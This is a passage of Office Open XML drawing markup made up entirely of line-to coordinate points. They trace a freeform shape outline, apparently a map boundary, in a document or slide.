                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="508" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="533" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="587" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="674" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="785" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="848" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="851" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="875" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="879" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="883" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="889" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="892" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="895" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="900" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="904" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="906" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="910" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="916" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="917" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="910" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="906" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="906" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="904" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="900" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="891" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="892" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="889" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="883" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="880" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="875" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="872" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="873" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="862" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="854" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="868" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="868" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="857" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="854" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="851" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="848" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="835" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="814" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="808" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="189"/>
